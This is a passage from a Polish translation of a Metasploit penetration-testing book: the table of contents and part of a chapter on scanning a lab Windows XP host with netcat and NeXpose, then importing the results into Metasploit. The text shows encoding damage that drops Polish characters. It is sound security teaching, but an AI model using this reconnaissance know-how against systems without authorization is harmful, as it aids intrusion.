Tytuł oryginału: Metasploit: The Penetration Tester's Guide

Tłumaczenie: Lech Lachowski

ISBN: 978-83-246-5010-1

Original edition copyright © 2011 by David Kennedy, Jim O’Gorman, Devon Kearns, and Mati Aharoni.All rights reserved.

Published by arrangement with No Starch Press, Inc.

Polish edition copyright 2013 by HELION SA.All rights reserved.

All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from the Publisher.

Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Autor oraz Wydawnictwo HELION dołożyli wszelkich starań, by zawarte w tej książce informacje były kompletne i rzetelne. Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich. Autor oraz Wydawnictwo HELION nie ponoszą również żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce.

Wydawnictwo HELIONul. Kościuszki 1c, 44-100 GLIWICEtel. 32 231 22 19, 32 230 98 63e-mail: helion@helion.plWWW: http://helion.pl (księgarnia internetowa, katalog książek)

Drogi Czytelniku!Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres http://helion.pl/user/opinie/metaspMożesz tam wpisać swoje uwagi, spostrzeżenia, recenzję.

Printed in Poland.

• Kup książkę• Poleć książkę • Oceń książkę

• Księgarnia internetowa• Lubię to! » Nasza społeczność

Spis tre�ci

PRZEDMOWA 11

S�OWO WST�PNE 15

PODZI�KOWANIA 17

WPROWADZENIE 19Dlaczego trzeba przeprowadza� testy penetracyjne? ................................................................20Dlaczego Metasploit? ..................................................................................................................20Krótka historia Metasploit ...........................................................................................................20Na temat tej ksi��ki ......................................................................................................................21Jaka jest zawarto�� tej ksi��ki? ....................................................................................................22Uwagi na temat etyki ...................................................................................................................23

1ABSOLUTNE PODSTAWY TESTÓW PENETRACYJNYCH 25Fazy PTES ....................................................................................................................................26

Czynno�ci wst�pne .................................................................................................................26Zbieranie informacji ...............................................................................................................26Modelowanie zagro�e� ..........................................................................................................27Analiza luk w zabezpieczeniach ............................................................................................27Eksploatacja ............................................................................................................................27Faza poeksploatacyjna ...........................................................................................................28Przygotowanie raportu ...........................................................................................................28

Typy testów penetracyjnych ........................................................................................................29Jawne testy penetracyjne .......................................................................................................29Ukryte testy penetracyjne ......................................................................................................30

Skanery luk w zabezpieczeniach .................................................................................................30Podsumowanie .............................................................................................................................31

4 S p i s t r e � c i

2PODSTAWY METASPLOIT 33Terminologia ................................................................................................................................ 33

Exploit .................................................................................................................................... 34�adunek .................................................................................................................................. 34Kod powoki ........................................................................................................................... 34Modu ..................................................................................................................................... 34Nasuchiwacz ......................................................................................................................... 34

Interfejsy Metasploit ................................................................................................................... 35Konsola MSFconsole ............................................................................................................. 35Interfejs wiersza polece� MSFcli ......................................................................................... 36Armitage ................................................................................................................................. 38

Narz�dzia Metasploit .................................................................................................................. 38MSFpayload ........................................................................................................................... 39MSFencode ............................................................................................................................ 40Nasm Shell ............................................................................................................................. 40

Metasploit Express oraz Metasploit Pro .................................................................................... 41Podsumowanie ............................................................................................................................. 41

3ZBIERANIE INFORMACJI 43Pasywne zbieranie informacji ..................................................................................................... 44

Wyszukiwanie whois ............................................................................................................. 44Netcraft .................................................................................................................................. 45NSLookup .............................................................................................................................. 46

Aktywne zbieranie informacji ..................................................................................................... 47Skanowanie portów za pomoc� narz�dzia Nmap ................................................................ 47Praca z baz� danych w Metasploit ........................................................................................ 49Skanowanie portów za pomoc� Metasploit .......................................................................... 54

Skanowanie ukierunkowane ....................................................................................................... 56Skanowanie bloku wiadomo�ci serwera ............................................................................... 56Polowanie na niewa�ciwie skonfigurowane serwery Microsoft SQL ................................ 57Skanowanie serwera SSH ..................................................................................................... 58Skanowanie FTP .................................................................................................................... 59Zamiatanie SNMP ................................................................................................................. 60

Pisanie niestandardowych skanerów .......................................................................................... 61Wybiegaj�c naprzód .................................................................................................................... 64

S p i s t r e � c i 5

4SKANOWANIE LUK W ZABEZPIECZENIACH 65Podstawowe skanowanie luk w zabezpieczeniach .....................................................................66Skanowanie za pomoc� NeXpose ................................................................................................67

Konfiguracja ...........................................................................................................................68Importowanie raportu do Metasploit Framework ...............................................................73Uruchamianie NeXpose z poziomu MSFconsole ................................................................74

Skanowanie za pomoc� aplikacji Nessus ....................................................................................76Konfiguracja skanera Nessus .................................................................................................76Tworzenie polityki skanowania Nessusa ...............................................................................77Uruchamianie skanowania za pomoc� Nessusa ....................................................................79Raporty skanera Nessus .........................................................................................................80Importowanie wyników do Metasploit Framework .............................................................80Skanowanie za pomoc� Nessusa z poziomu Metasploit ......................................................81

Wyspecjalizowane skanery luk w zabezpieczeniach .................................................................84Potwierdzanie logowania SMB .............................................................................................84Skanowanie w poszukiwaniu otwartego uwierzytelniania VNC .........................................86Skanowanie w poszukiwaniu otwartych serwerów X11 ......................................................88

Wykorzystywanie wyników skanowania do autopwningu .........................................................89

5PRZYJEMNO�� EKSPLOATACJI 91Podstawowa eksploatacja .............................................................................................................92

Polecenie msf> show exploits ...............................................................................................92Polecenie msf> show auxiliary .............................................................................................92Polecenie msf> show options ...............................................................................................92Polecenie msf> show payloads .............................................................................................94Polecenie msf> show targets ................................................................................................96Polecenie info .........................................................................................................................97Polecenia set i unset ...............................................................................................................97Polecenia setg i unsetg ...........................................................................................................98Polecenie save ........................................................................................................................98

Twoja pierwsza eksploatacja .......................................................................................................99Eksploatacja maszyny Ubuntu ..................................................................................................104�adunki sprawdzaj�ce wszystkie porty ....................................................................................106Pliki zasobów ..............................................................................................................................108Podsumowanie ...........................................................................................................................110

6 S p i s t r e � c i

6METERPRETER 111Przejmowanie maszyny wirtualnej Windows XP .................................................................... 112

Skanowanie portów za pomoc� narz�dzia Nmap .............................................................. 112Atak na MS SQL .................................................................................................................. 113Siowy atak na MS SQL Server .......................................................................................... 114Rozszerzona procedura xp_cmdshell ................................................................................. 115Podstawowe polecenia Meterpretera ................................................................................. 117Przechwytywanie uderze� klawiatury ................................................................................ 118

Wykonywanie zrzutów nazw u�ytkownika i hase .................................................................. 120Wyodr�bnianie skrótów hase ............................................................................................. 120Zrzuty skrótów hase ........................................................................................................... 121

Technika pass-the-hash ............................................................................................................. 122Zwi�kszanie uprawnie� ............................................................................................................ 123Zastosowanie tokenów personifikacji ....................................................................................... 125Zastosowanie polecenia ps ........................................................................................................ 125Pivoting innych systemów ........................................................................................................ 127Stosowanie skryptów Meterpretera ......................................................................................... 131

Migracja procesu ................................................................................................................. 132Unieruchamianie oprogramowania antywirusowego ........................................................ 132Uzyskiwanie skrótów hase do systemu ............................................................................. 132ledzenie caego ruchu na maszynie docelowej ................................................................ 133Scrapowanie systemu .......................................................................................................... 133Zastosowanie skryptu persystencji ..................................................................................... 133

Wykorzystywanie moduów fazy poeksploatacyjnej ............................................................... 135Uaktualnianie powoki polece� do Meterpretera .................................................................... 135Operowanie interfejsami API systemu Windows za pomoc� dodatku Railgun .................... 137Podsumowanie ........................................................................................................................... 138

7UNIKANIE WYKRYCIA 139Tworzenie samodzielnych plików binarnych za pomoc� MSFpayload ................................. 140Unikanie wykrycia przez program antywirusowy ................................................................... 142

Kodowanie za pomoc� narz�dzia MSFencode .................................................................. 142Wielokrotne kodowanie ...................................................................................................... 144

Niestandardowe szablony plików wykonywalnych ................................................................. 146Potajemne uruchamianie adunku ............................................................................................ 147Programy kompresuj�ce ............................................................................................................ 149Ko�cowe uwagi dotycz�ce unikania wykrycia przez oprogramowanie antywirusowe ......... 150

S p i s t r e � c i 7

8WYKORZYSTANIE ATAKÓW TYPU CLIENT-SIDE 151Exploity przegl�darek ................................................................................................................152

Jak dziaaj� exploity przegl�darek .......................................................................................153Rzut oka na instrukcje NOP ................................................................................................154

Wykorzystanie programu Immunity Debugger do odczytywania kodu powoki NOP .........155Aurora — exploit przegl�darki Internet Explorer ...................................................................158Podatno�� formatu pliku ............................................................................................................163Przesyanie adunku ...................................................................................................................164Podsumowanie ...........................................................................................................................165

9MODU�Y POMOCNICZE METASPLOIT 167Moduy pomocnicze w dziaaniu ..............................................................................................170Budowa moduu pomocniczego ................................................................................................173Wybiegaj�c naprzód ...................................................................................................................178

10PAKIET NARZ�DZI SOCJOTECHNICZNYCH — SOCIAL-ENGINEER TOOLKIT 179Konfiguracja pakietu Social-Engineer Toolkit .........................................................................180Wektor ataku spear-phishing ....................................................................................................181Wektory ataków WWW .............................................................................................................187

Aplet Javy ..............................................................................................................................187Exploity WWW typu client-side .........................................................................................192Zbieranie nazw u�ytkowników i hase ................................................................................194Tabnabbing ...........................................................................................................................196Atak typu man-left-in-the-middle .......................................................................................196Metoda Web Jacking ............................................................................................................197Atak wieloaspektowy ............................................................................................................199

Zainfekowane no�niki danych ...................................................................................................204Wektor ataku Teensy USB HID ...............................................................................................204Dodatkowe funkcje pakietu SET ..............................................................................................207Wybiegaj�c naprzód ...................................................................................................................208

11FAST-TRACK 209Wstrzykni�cie Microsoft SQL ...................................................................................................210

Narz�dzie SQL Injector — atak z wykorzystaniem a�cucha zapytania ..........................211Narz�dzie SQL Injector — atak z wykorzystaniem parametru POST .............................212R�czne wstrzykiwanie ..........................................................................................................213Narz�dzie MSSQL Bruter ...................................................................................................215Narz�dzie SQLPwnage ........................................................................................................219

8 S p i s t r e � c i

Generator zmiany formatu z binarnego na heksadecymalny .................................................. 222Zmasowany atak typu client-side ............................................................................................. 222Kilka sów na temat automatyzacji ........................................................................................... 225

12KARMETASPLOIT 227Konfiguracja ............................................................................................................................... 228Uruchamianie ataku .................................................................................................................. 230Zbieranie po�wiadcze� .............................................................................................................. 232Uzyskiwanie dost�pu do powoki ............................................................................................. 233Podsumowanie ........................................................................................................................... 236

13TWORZENIE W�ASNYCH MODU�ÓW 237Wykonywanie polece� na Microsoft SQL ............................................................................... 238Analiza gotowego moduu Metasploit ...................................................................................... 240Tworzenie nowego moduu ...................................................................................................... 241

PowerShell ........................................................................................................................... 242Uruchamianie exploita powoki .......................................................................................... 243Definiowanie funkcji powershell_upload_exec ................................................................. 245Konwersja z formatu heksadecymalnego na format binarny ............................................ 246Liczniki ................................................................................................................................. 247Uruchamianie exploita ........................................................................................................ 249

Korzy�ci pyn�ce z wykorzystywania istniej�cego kodu ......................................................... 250

14TWORZENIE W�ASNYCH EXPLOITÓW 251Sztuka fuzzingu .......................................................................................................................... 252Kontrolowanie SEH .................................................................................................................. 256Omijanie ogranicze� SEH ........................................................................................................ 258Uzyskiwanie adresu zwrotnego ................................................................................................ 261Ze znaki i zdalne wykonywanie kodu ...................................................................................... 266Podsumowanie ........................................................................................................................... 269

15IMPORTOWANIE EXPLOITÓW DO METASPLOIT FRAMEWORK 271Podstawy j�zyka asemblera ....................................................................................................... 272

Rejestry EIP i ESP .............................................................................................................. 272Zestaw instrukcji JMP ......................................................................................................... 272Instrukcje NOP i NOP slide’y ............................................................................................ 272

S p i s t r e � c i 9

Importowanie exploita przepenienia bufora ...........................................................................273Rozkadanie na cz��ci gotowego exploita ...........................................................................274Konfigurowanie definicji exploita .......................................................................................276Testowanie podstawowego exploita ....................................................................................276Implementowanie funkcji Metasploit Framework ............................................................278Dodawanie randomizacji .....................................................................................................279Usuwanie NOP slide ............................................................................................................280Usuwanie fikcyjnego kodu powoki ....................................................................................280Kompletny modu ................................................................................................................281

Exploit nadpisania rekordu SEH ..............................................................................................283Podsumowanie ...........................................................................................................................291

16J�ZYK SKRYPTOWY METERPRETERA 293Podstawy j�zyka skryptowego Meterpretera ...........................................................................293Interfejs API Meterpretera .......................................................................................................300

Wy�wietlanie komunikatów .................................................................................................300Podstawowe wywoania API ................................................................................................301Domieszki Meterpretera .....................................................................................................302

Zasady pisania skryptów Meterpretera .....................................................................................304Tworzenie wasnego skryptu Meterpretera .............................................................................304Podsumowanie ...........................................................................................................................311

17SYMULOWANY TEST PENETRACYJNY 313Czynno�ci wst�pne ....................................................................................................................314Zbieranie informacji ...................................................................................................................314Modelowanie zagro�e� ..............................................................................................................315Eksploatacja ................................................................................................................................317Dostosowywanie MSFconsole ..................................................................................................318Faza poeksploatacyjna ...............................................................................................................319

Skanowanie systemu Metasploitable ..................................................................................321Identyfikacja usug podatnych na ataki ...............................................................................322

Atak na serwer Apache Tomcat .................................................................................................323Atakowanie nietypowych usug .................................................................................................326Zacieranie �ladów .......................................................................................................................327Podsumowanie ...........................................................................................................................330

10 S p i s t r e � c i

AKONFIGURACJA MASZYN TESTOWYCH 331Instalacja i konfiguracja systemów ........................................................................................... 331Uruchamianie maszyn wirtualnych z systemem Linux ........................................................... 332Przygotowywanie instalacji Windows XP podatnej na ataki .................................................. 333

Konfiguracja serwera WWW na systemie Windows XP ................................................... 333Instalacja i konfiguracja serwera SQL ................................................................................ 334Tworzenie podatnej na ataki aplikacji WWW ................................................................... 336Aktualizacja systemu Back|Track ....................................................................................... 339

B�CI�GAWKA 341Polecenia MSFconsole .............................................................................................................. 341Polecenia Meterpretera ............................................................................................................ 343Polecenia MSFpayload ............................................................................................................. 346Polecenia MSFencode .............................................................................................................. 346Polecenia MSFcli ...................................................................................................................... 347MSF, Ninja, Fu ......................................................................................................................... 347MSFvenom ................................................................................................................................ 348Polecenia Meterpretera dla fazy poeksploatacyjnej ................................................................ 348

SKOROWIDZ 351

4Skanowanie luk

w zabezpieczeniach

Skaner luk w zabezpieczeniach (ang. vulnerability scanner) jest zautomatyzo-wanym programem przeznaczonym do wyszukiwania sabych punktów kom-puterów, systemów komputerowych, sieci oraz aplikacji. Program ten sondujesystem, wysyaj�c do niego poprzez sie� porcj� danych i analizuj�c otrzymaneodpowiedzi. Ma to na celu enumeracj� wszelkich luk w zabezpieczeniach celupoprzez wykorzystanie jako punktu odniesienia wasnej bazy danych luk w za-bezpieczeniach.

Ró�ne systemy operacyjne zazwyczaj odmiennie reaguj� na wysyane próbkisieciowe z uwagi na wykorzystywanie ró�nych implementacji sieciowych. Teunikatowe odpowiedzi su�� jako odcisk palca (ang. fingerprint), który jest wy-korzystywany przez skaner luk w zabezpieczeniach do okre�lenia wersji systemuoperacyjnego, a nawet poziomu zainstalowanych poprawek. Skaner luk w za-bezpieczeniach mo�e równie� wykorzystywa� zestawy po�wiadcze� u�ytkowni-ka w celu zalogowania si� do zdalnego systemu i dokonania enumeracji opro-gramowania i usug, co pozwala okre�li�, czy system jest zaatany. Na podstawieuzyskanych wyników przedstawia raport wyliczaj�cy wszystkie luki w zabezpie-czeniach wykryte w danym systemie. Taki raport mo�e by� u�yteczny zarównodla administratorów sieci, jak i dla pentesterów.

66 R o z d z i a � 4

Skanery luk w zabezpieczeniach zasadniczo generuj� du�y ruch w sieci i dla-tego nie s� zazwyczaj wykorzystywane w testach penetracyjnych, kiedy jednymz zao�e� jest pozostanie niewykrytym. Je�li jednak przeprowadzasz test pene-tracyjny, w przypadku którego wykrycie nie stanowi problemu, to taki skanermo�e zaoszcz�dzi� Ci r�cznego sondowania systemów w celu okre�lenia luk w za-bezpieczeniach oraz poziomów zainstalowanych poprawek.

Bez wzgl�du na to, czy korzystasz ze zautomatyzowanych skanerów, czy wy-konujesz te dziaania r�cznie, skanowanie jest zawsze jednym z najbardziej istot-nych elementów w procesie przeprowadzania testów penetracyjnych. Je�li zo-stanie ono wykonane dokadnie, b�dzie stanowio najwi�ksz� warto�� dla Twojegoklienta. W tym rozdziale omówimy szereg skanerów luk w zabezpieczeniachoraz sposoby ich integracji z Metasploit. Wska�emy równie� kilka moduówpomocniczych w Metasploit Framework, które mog� lokalizowa� okre�lone lukiw zabezpieczeniach systemów zdalnych.

Podstawowe skanowanie lukw zabezpieczeniach

Przyjrzyjmy si�, jak dziaa skanowanie na najbardziej podstawowym poziomie.W zamieszczonym poni�ej listingu zastosujemy netcat do przechwycenia baneruz celu o adresie IP 192.168.1.203. Przychwytywanie banerów (ang. banner grabbing)polega na po�czeniu si� z usug� zdalnej sieci i odczytaniu zwracanego identy-fikatora (baneru) tej usugi. Wiele usug sieciowych, takich jak WWW, transferplików oraz serwery pocztowe, zwraca swoje banery natychmiast po nawi�zaniuz nimi po�czenia lub w odpowiedzi na okre�lone polecenie. Po�czymy si� te-raz z serwerem WWW na porcie TCP 80 i wy�lemy ��danie GET HTTP, któreumo�liwi nam przyjrzenie si� nagówkowi informacji zwracanej przez ten zdal-ny serwer w odpowiedzi na nasze ��danie.

root@bt:/opt/framework3/msf3# nc 192.168.1.203 80GET HTTP 1/1HTTP/1.1 400 Bad Request

� Server: Microsoft-IIS/5.1

Informacja zwrócona w punkcie � informuje nas, �e system dziaaj�cy naporcie 80 jest serwerem WWW opartym na Microsoft IIS 5.1. Uzbrojeni w t�informacj� mogliby�my wykorzysta� skaner luk w zabezpieczeniach, tak jak po-kazuje to rysunek 4.1, do okre�lenia, czy ta wersja IIS posiada jakie� luki w za-bezpieczeniach i czy ten konkretny serwer ma zainstalowane poprawki.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 67

Rysunek 4.1. Wyniki skanowania luk w zabezpieczeniach docelowego serwera WWW

Oczywi�cie w praktyce nie jest to takie proste. Skanery luk w zabezpiecze-niach cz�sto generuj� wiele wyników fa�szywie pozytywnych (ang. false positives,np. raportowanie luki w zabezpieczeniach tam, gdzie jej nie ma) oraz fa�szywienegatywnych (ang. false negatives, np. niewykrycie luki w zabezpieczeniachtam, gdzie ona istnieje). Ma to zwi�zek z subtelnymi ró�nicami w konfiguracjisystemów i aplikacji. Ponadto twórcy skanerów luk w zabezpieczeniach maj�motywacj�, by skanery zgaszay jak najwi�cej pozytywnych wyników, poniewa�im wi�cej „trafie�”, tym lepiej wygl�da to dla potencjalnego nabywcy. Skanery lukw zabezpieczeniach s� na tyle dobre, na ile dobre s� ich bazy danych. Mo�na jerównie� atwo oszuka� za pomoc� faszywych banerów lub niespójnych konfiguracji.

Przyjrzyjmy si� kilku najbardziej u�ytecznym skanerom luk w zabezpiecze-niach, takim jak NeXpose, Nessus oraz inne wyspecjalizowane skanery.

Skanowanie za pomoc� NeXposeNeXpose to dostarczony przez Rapid7 skaner luk w zabezpieczeniach, który ska-nuje sieci w celu identyfikacji dziaaj�cych w nich urz�dze� oraz przeprowadzakontrol�, �eby okre�li� sabe punkty bezpiecze�stwa systemów operacyjnychi aplikacji. Nast�pnie dane uzyskane podczas skanowania s� analizowane i prze-twarzane do za�czenia w ró�nych raportach.

Rapid7 oferuje wiele wersji skanera NeXpose, jednak my skorzystamy z edycjiCommunity, poniewa� jest ona darmowa. Je�li zamierzasz wykorzystywa� NeXposew celach komercyjnych, sprawd� informacje na temat ró�nych wersji tej aplikacji,ich funkcji oraz cen na stronie Rapid7 (http://www.rapid7.com/vulnerability-scanner.jsp).

Celem naszego skanowania b�dzie domy�lna instalacja Windows XP SP2, skon-figurowana wedug wskazówek z za�cznika A. Najpierw wykonamy podstawoweskanowanie jawne naszego celu i zaimportujemy wyniki do Metasploit. T� sek-cj� zako�czymy omówieniem sposobu przeprowadzania skanowania NeXposebezpo�rednio z poziomu msfconsole zamiast korzystania z interfejsu WWW, coeliminuje konieczno�� importowania wyników skanowania.

68 R o z d z i a � 4

KonfiguracjaPo zainstalowaniu NeXpose Community otwórz przegl�dark� i wpisz w paskuadresowym https://<twój_adres_ip>:3780. Zaakceptuj certyfikat z podpisem wa-snym NeXpose i zaloguj si�, u�ywaj�c po�wiadcze�, które podae� podczas instalacji.Powinien si� teraz uruchomi� interfejs podobny do pokazanego na rysunku 4.2.(Dokadne instrukcje instalacji NeXpose znajdziesz na stronie Rapid7).

Rysunek 4.2. Zak�adka Home startowego interfejsu NeXpose

Na górnym pasku na gównej stronie NeXpose dost�pnych jest kilka zakadek:

� Zakadka Assets (zasoby) w punkcie � wy�wietla szczegóyprzeskanowanych komputerów i innych urz�dze� w Twojej sieci.

� Zakadka Reports (raporty) w punkcie � zawiera list� wygenerowanychraportów ze skanowania luk w zabezpieczeniach.

� Zakadka Vulnerabilities (luki w zabezpieczeniach) w punkcie � zawieraszczegóy dotycz�ce wszelkich luk w zabezpieczeniach, wykrytychpodczas przeprowadzonych skanowa�.

� Zakadka Administration (administrowanie) w punkcie � umo�liwiakonfiguracj� ró�nych opcji.

Przyciski znajduj�ce si� w gównym obszarze interfejsu umo�liwiaj� wyko-nywanie typowych zada�, takich jak tworzenie nowego �rodowiska lub definio-wanie nowego skanowania luk w zabezpieczeniach.

Kreator nowego �rodowiskaZanim rozpoczniesz skanowanie luk w zabezpieczeniach za pomoc� NeXpose,musisz skonfigurowa� �rodowisko (ang. site) — logiczne zestawienie elementów,takich jak okre�lona podsie�, grupa serwerów, a nawet pojedyncze stacje robocze.Takie �rodowiska b�d� nast�pnie skanowane przez NeXpose, a dla ka�dego kon-kretnego �rodowiska mo�na zdefiniowa� ró�ne rodzaje skanowania.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 69

1. Aby utworzy� nowe �rodowisko, kliknij przycisk New Site w zakadceHome skanera NeXpose, wprowad� nazw� strony (pole Name) oraz krótkiopis (pole Description), a nast�pnie kliknij przycisk Next.

2. Na kolejnym etapie, przedstawionym na rysunku 4.3, mo�esz szczegóowozdefiniowa� swoje cele. Mo�esz doda� pojedynczy adres IP, zakresadresów IP, nazwy hostów itd. Mo�esz równie� wy�czy� ze skanowaniaurz�dzenia, takie jak drukarki. (Drukarki zazwyczaj niezbyt dobrzereaguj� na skanowanie. Mieli�my do czynienia z przypadkami, kiedyproste skanowanie luk w zabezpieczeniach powodowao uruchomieniew drukarce kolejki drukowania ponad miliona czarnych stron!).Po zako�czeniu dodawania (pole Included Devices) i wy�czania(pole Excluded Devices) urz�dze� ze skanowania kliknij przycisk Next.

Rysunek 4.3. Dodawanie urz�dze� do nowego �rodowiska NeXpose

3. Teraz masz do wyboru kilka ró�nych szablonów skanowania(Scan Template), takich jak Discovery Scan (skanowanie ujawniaj�ce)lub Penetration test (test penetracyjny). Mo�esz równie� wybra� silnikskanowania (Scan Engine) oraz zdefiniowa� harmonogram automatycznegoskanowania (Scan Schedule). Dla celów niniejszego omówienia procedurypozostaw warto�ci domy�lne i kliknij przycisk Next.

4. Je�li posiadasz po�wiadczenia (ang. credentials) dla �rodowiska, którechcesz skanowa�, to mo�esz je doda� na tym etapie. Po�wiadczenia mog�pomóc w wygenerowaniu bardziej dokadnych i kompletnych wynikówdzi�ki dog�bnej enumeracji zainstalowanego oprogramowania i politykisystemu danego celu.

70 R o z d z i a � 4

5. W zakadce Credentials kliknij przycisk New Login, podaj nazw�u�ytkownika i haso dla adresu IP, który chcesz skanowa�, a nast�pniekliknij Test Login, �eby je zweryfikowa�. Zapisz po�wiadczenia.

6. Na koniec kliknij przycisk Save, aby zako�czy� dziaanie kreatora nowego�rodowiska i powróci� do zakadki Home. W tej zakadce powinno by� terazwidoczne nowe �rodowisko, które wa�nie dodae�. Pokazuje to rysunek 4.4.

Rysunek 4.4. Zak�adka Home, na której wida� informacj� o nowo utworzonym�rodowisku

Kreator nowego skanowania r�cznegoJe�li skonfigurowae� ju� nowe �rodowisko, mo�esz przygotowa� pierwszeskanowanie:

1. Kliknij przycisk New Manual Scan (nowe skanowanie r�czne), widocznyna rysunku 4.4. Powinno zosta� wy�wietlone okno dialogowe Start NewScan (rozpocznij nowe skanowanie), tak jak na rysunku 4.5. W tym okniedefiniujesz elementy, które chcesz skanowa� (Included assets), oraz te,które chcesz ze skanowania wy�czy� (Excluded assets). W tym przykadzieb�dziemy skanowa� nasz domy�lny system Windows XP.

2. Sprawd� dobrze docelowy adres IP, aby upewni� si�, �e nie przeskanujeszprzypadkowo niewa�ciwego urz�dzenia lub sieci. Kliknij przycisk Start Now,�eby rozpocz��.

3. NeXpose powinien automatycznie od�wie�a� bie��c� stron� w miar�post�pów skanowania. Poczekaj, a� status dla Scan Progress (post�pskanowania) oraz Discovered Assets (odkryte zasoby) b�dzie wskazywaCompleted (zako�czone), tak jak wida� to na rysunku 4.6. W sekcjiScan Progress mo�esz zobaczy�, �e skanowanie naszego pojedynczegourz�dzenia doprowadzio do wykrycia 268 luk w zabezpieczeniach.Z kolei sekcja Discovered Assets zawiera wi�cej informacji na temat celu,takich jak nazwa urz�dzenia oraz jego system operacyjny. Przejd� terazdo zakadki Reports.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 71

Rysunek 4.5. Okno dialogowe konfiguracji skanowania w NeXpose

Rysunek 4.6. Uko�czone skanowanie w NeXpose

Kreator nowego raportuJe�li uruchomie� NeXpose po raz pierwszy i uko�czye� tylko jedno skanowanie,to zakadka Reports powinna pokazywa�, �e nie masz wygenerowanego �adnegoraportu.

1. Aby uruchomi� kreatora nowego raportu, kliknij przycisk New Report,tak jak pokazuje to rysunek 4.7.

72 R o z d z i a � 4

Rysunek 4.7. Zak�adka Reports skanera NeXpose

2. W polu Report name wprowad� nazw�, jak� wybrae� dla danego raportu.W polu Report format wybierz opcj� NeXpose Simple XML Report, co umo�liwiCi zaimportowanie wyników skanowania do Metasploit. Mo�esz równie�wybra� szablon raportu w polu Report template oraz skonfigurowa� odpowiedni�stref� czasow� w polu Report time zone, je�li na przykad przeprowadzaszswój test penetracyjny w podró�y. Wspomniane opcje przedstawionezostay na rysunku 4.8. Kliknij przycisk Next, je�li chcesz kontynuowa�.

Rysunek 4.8. Wybór nazwy i formatu raportu

3. W kolejnym oknie dodaj urz�dzenia, które maj� by� w�czone do raportu,klikaj�c Select Sites (wybierz �rodowiska) i dodaj�c zakres przeskanowanegocelu, tak jak pokazuje to rysunek 4.9. Nast�pnie kliknij Save (zapisz).

Rysunek 4.9. Wybór �rodowiska, które ma by� za��czone w raporcie

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 73

4. W oknie dialogowym Select Devices wybierz elementy docelowe, któremaj� by� za�czone w Twoim raporcie. Nast�pnie kliknij Save.

5. B�d�c na powrót w oknie Report Configuration (konfiguracja raportu),kliknij Save, aby zaakceptowa� pozostae warto�ci domy�lne dla danegoraportu. Na li�cie w zakadce Reports powinien teraz pojawi� si� nowoutworzony raport, tak jak przedstawia to rysunek 4.10. (Pami�taj, �ebyzapisa� plik raportu, aby móc u�y� go w Metasploit Framework).

Rysunek 4.10. Zak�adka Reports wy�wietlaj�ca list� raportów

Importowanie raportu do Metasploit FrameworkPo przeprowadzeniu penego skanowania luk w zabezpieczeniach za pomoc�aplikacji NeXpose musisz zaimportowa� wyniki do Metasploit. Zanim jednak tozrobisz, powiniene� utworzy� now� baz� danych, stosuj�c polecenie db_connectz poziomu msfconsole. Po utworzeniu bazy danych mo�esz zaimportowa� plikXML z NeXpose za pomoc� polecenia db_import. Metasploit automatycznie wy-kryje, �e dany plik pochodzi z aplikacji NeXpose, i zaimportuje przeskanowanegohosta. Teraz mo�esz zweryfikowa� poprawno�� przeprowadzonego importu, wpi-suj�c polecenie db_hosts. (Wymienione czynno�ci przedstawia poni�szy listing).Jak mo�esz zauwa�y� w punkcie �, Metasploit posiada teraz informacje o 268lukach w zabezpieczeniach, wykrytych podczas przeprowadzonego przez Ciebieskanowania.

msf > db_connect postgres:toor@127.0.0.1/msf3msf > db_import /tmp/host_195.xml[*] Importing 'NeXpose Simple XML' data[*] Importing host 192.168.1.195[*] Successfully imported /tmp/host_195.xml

msf > db_hosts -c address,svcs,vulns

Hosts=====address Svcs Vulns Workspace------- ---- ----- ---------192.168.1.195 8 268 � default

74 R o z d z i a � 4

Aby wy�wietli� wszystkie szczegóy luk w zabezpieczeniach zaimportowanychdo Metasploit, w tym liczb� typowych luk w zabezpieczeniach i ekspozycji (ang.Common Vulnerabilities and Exposures — CVE), zastosuj poni�sze polecenie:

msf > db_vulns

Jak widzisz, przeprowadzenie jawnego skanowania luk w zabezpieczeniachz penymi po�wiadczeniami mo�e dostarczy� niesamowitej ilo�ci informacji — w tymprzypadku odnaleziono 268 luk w zabezpieczeniach. Jednak z oczywistych wzgl�-dów byo to skanowanie charakteryzuj�ce si� wysokim poziomem szumów, któreprawdopodobnie przyci�gn�y du�o uwagi. Tego rodzaju skanowania najlepiejsprawdzaj� si� w testach penetracyjnych niewymagaj�cych potajemnych dziaa�.

Uruchamianie NeXpose z poziomu MSFconsoleUruchamianie aplikacji NeXpose z poziomu interfejsu graficznego WWW do-skonale sprawdza si� w przypadku precyzyjnego skanowania luk w zabezpiecze-niach oraz generowania raportów. Je�li jednak wolisz pozosta� przy msfconsole,tak�e mo�esz przeprowadzi� pene skanowanie luk w zabezpieczeniach — dzi�kiwtyczce NeXpose do�czonej do Metasploit.

Aby zademonstrowa� ró�nic� w wynikach pomi�dzy po�wiadczonym i nie-po�wiadczonym skanowaniem, uruchomimy teraz skanowanie z Metasploit bezokre�lania nazwy u�ytkownika i hasa dla docelowego systemu. Zanim rozpocz-niesz, usu� wszystkie istniej�ce bazy danych za pomoc� polecenia db_destroy,utwórz now� baz� danych w Metasploit za pomoc� polecenia db_connect, a na-st�pnie zaaduj wtyczk� NeXpose, stosuj�c polecenie load nexpose. Ilustruje toponi�szy listing.

msf > db_destroy postgres:toor@127.0.0.1/msf3[*] Warning: You will need to enter the password at the prompts belowPassword:

msf > db_connect postgres:toor@127.0.0.1/msf3

msf > load nexpose

[*] NeXpose integration has been activated[*] Successfully loaded plugin: nexpose

